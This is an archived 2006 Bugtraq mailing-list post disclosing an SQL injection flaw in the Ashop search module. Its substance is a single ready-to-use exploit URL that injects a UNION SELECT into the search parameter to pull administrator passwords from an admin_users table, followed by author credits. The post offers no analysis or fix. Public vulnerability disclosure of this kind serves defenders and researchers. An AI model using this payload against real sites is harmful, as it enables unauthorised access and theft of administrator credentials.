[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Ashop Search Module SQL injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ashop Search Module SQL injection
From: entrika_fs@xxxxxxxxx
Date: 13 Jun 2006 16:48:55 -0000

http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search

credits: EntriKa & The_BeKiR & erne

Prev by Date: VampireFreaks journal XSS
Next by Date: Facetherating.com - XSS & session disclosure
Previous by thread: VampireFreaks journal XSS
Next by thread: Facetherating.com - XSS & session disclosure
Index(es):
- Date
- Thread